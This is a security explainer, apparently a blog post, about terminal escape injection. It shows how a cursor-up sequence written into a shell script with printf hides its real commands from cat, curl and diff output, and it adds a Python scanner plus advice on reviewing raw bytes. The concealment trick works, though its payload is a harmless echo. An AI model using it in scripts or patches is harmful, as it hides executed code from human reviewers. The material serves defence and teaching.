How it technically works
- A terminal escape sequence is a special sequence of characters that is printed like any other text.
- If the terminal understands the sequence, it does not display the characters but performs an action instead.
$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho doing something very nice!\n' > backdoor.sh
$ chmod +x backdoor.sh
$ cat backdoor.sh
#!/bin/bash
echo doing something very nice!
$ ./backdoor.sh
doing something evil!
- As you can see, our beloved ‘cat’ cheated on us.
- Instead of displaying the character sequence, the terminal acted on the escape sequence \033[XA (where X is a number).
- That action moves the cursor up X lines, so the text printed after it overwrites the lines above instead of appearing below them.
- But this doesn't affect only cat; it affects every tool that writes the file to the terminal unchanged, because it is the terminal that interprets the escape sequences.
$ head backdoor.sh
#!/bin/bash
echo doing something very nice!
$ tail backdoor.sh
#!/bin/bash
echo doing something very nice!
$ more backdoor.sh
#!/bin/bash
echo doing something very nice!
$ curl 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!
$ wget -qO - 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!
- But if we pipe it into a shell:
$ curl -s 127.0.0.1/backdoor.sh|sh
doing something evil!
$ wget -qO - 127.0.0.1/backdoor.sh|sh
doing something evil!
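Because the hiding happens in the terminal, not in the file, the defence is to inspect the raw bytes before they are ever rendered (or piped to sh). The scanner below is an added example, not part of the original post: it flags ECMA-48 CSI sequences (ESC [ ... final byte) and bare control bytes, renders them the way `cat -v` would (ESC as `^[`), and returns a verdict that separates sequences able to move the cursor or erase text from ones that only change colour. The sample scripts are constructed inline; the backdoor one is the same content the printf above produces.

```python
"""Scan a script for terminal escape sequences before displaying or running it."""
import re
import sys

# ECMA-48 Control Sequence Introducer: ESC '[' parameters intermediates final-byte
CSI_RE = re.compile(rb"\x1b\[([0-?]*)([ -/]*)([@-~])")
# C0 control bytes other than TAB/LF, plus DEL; none of these belong in a plain script
CONTROL_RE = re.compile(rb"[\x00-\x08\x0b-\x1f\x7f]")

# Meaning of common CSI final bytes; only the cursor/erase ones can hide earlier output
CSI_FINAL = {
    b"A": "cursor up", b"B": "cursor down", b"C": "cursor forward", b"D": "cursor back",
    b"H": "cursor position", b"J": "erase in display", b"K": "erase in line",
    b"m": "select graphic rendition (colour/bold)",
}
HIDING = {b"A", b"B", b"C", b"D", b"H", b"J", b"K"}


def render_visible(data: bytes) -> str:
    """Render control bytes like `cat -v`: ESC -> ^[, other C0 -> ^X, DEL -> ^?, high -> M-x."""
    out = []
    for b in data:
        if b in (0x09, 0x0A):
            out.append(chr(b))
        elif b < 0x20:
            out.append("^" + chr(b + 0x40))
        elif b == 0x7F:
            out.append("^?")
        elif b >= 0x80:
            low = b - 0x80
            out.append("M-" + ("^" + chr(low + 0x40) if low < 0x20 else "^?" if low == 0x7F else chr(low)))
        else:
            out.append(chr(b))
    return "".join(out)


def find_escapes(data: bytes) -> list:
    """One finding per control sequence: line number, visible rendering, meaning, hides_text."""
    findings = []
    for lineno, line in enumerate(data.split(b"\n"), start=1):
        consumed = set()  # byte offsets already explained by a CSI match
        for m in CSI_RE.finditer(line):
            final = m.group(3)
            findings.append({
                "line": lineno,
                "sequence": render_visible(m.group(0)),
                "meaning": CSI_FINAL.get(final, "CSI final byte %r" % final),
                "hides_text": final in HIDING,
            })
            consumed.update(range(m.start(), m.end()))
        for m in CONTROL_RE.finditer(line):
            if m.start() in consumed:
                continue
            if m.group(0) == b"\r" and m.end() == len(line):
                continue  # CRLF line ending, not an overwrite trick
            findings.append({
                "line": lineno,
                "sequence": render_visible(m.group(0)),
                "meaning": "bare control byte",
                # a lone ESC starts some other sequence; CR and BS rewrite the current line
                "hides_text": m.group(0) in (b"\x1b", b"\r", b"\x08"),
            })
    return findings


def verdict(data: bytes) -> str:
    """'clean' (no control sequences), 'review' (colour only), or 'block' (can hide text)."""
    findings = find_escapes(data)
    if not findings:
        return "clean"
    if any(f["hides_text"] for f in findings):
        return "block"
    return "review"


def report(data: bytes) -> str:
    lines = ["verdict: " + verdict(data)]
    for f in find_escapes(data):
        lines.append("line %d: %s  (%s%s)" % (
            f["line"], f["sequence"], f["meaning"], ", can hide text" if f["hides_text"] else ""))
    return "\n".join(lines)


# Constructed samples: the backdoor from the printf above, a clean script, and a colour-only one
BACKDOOR = b"#!/bin/bash\necho doing something evil!\nexit\n\x1b[2Aecho doing something very nice!\n"
LEGIT = b"#!/bin/bash\necho doing something very nice!\n"
COLOURED = b'#!/bin/bash\necho "\x1b[32mok\x1b[0m"\n'

if __name__ == "__main__":
    # usage: python scan.py script.sh   (no argument scans the constructed samples)
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(report(fh.read()))
    else:
        for name, sample in (("backdoor.sh", BACKDOOR), ("legit.sh", LEGIT), ("colour.sh", COLOURED)):
            print("== %s ==\n%s" % (name, report(sample)))
```

Run it on a download before `sh` sees it (`curl -s URL -o script.sh && python scan.py script.sh`), and note why the verdict is three-valued: an SGR colour sequence inside an echo is common in legitimate installers, whereas nothing in a script you did not write has a reason to move the cursor or erase the screen of the person reading it.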
- The escape sequences also pass straight through diff, so they end up in the resulting patches and hide lines whenever the patch is viewed on a terminal:
$ cat backdoor.sh #evil file
#!/bin/bash
echo doing something very nice!
$ cat legit.sh #actually echoes doing something very nice!
#!/bin/bash
echo doing something very nice!
$ diff -Naur backdoor.sh legit.sh
--- backdoor.sh 2015-09-17 16:25:42.985349535 +0100
+++ legit.sh 2015-09-17 16:26:14.950158635 +0100
@@ -1,4 +1,2 @@
#!/bin/bash
-echo doing something very nice!
+echo doing something very nice!
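Review bot: the hunk header `@@ -1,4 +1,2 @@` accounts for one context line, three removed lines and one added line, yet only one `-` line and one `+` line are visible, so two removed lines are being hidden by the terminal escape sequence carried in the removed text (the visible `-` and `+` lines even look identical). Review patches from untrusted sources on their raw bytes, for example `diff -Naur backdoor.sh legit.sh | cat -v`, which renders ESC as `^[` instead of letting the terminal act on it.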
Reference
- http://www.openwall.com/lists/oss-security/2015/09/17/5
- http://www.openwall.com/lists/oss-security/2015/08/11/8
- http://turbochaos.blogspot.ca/2014/08/journalctl-terminal-escape-injection.html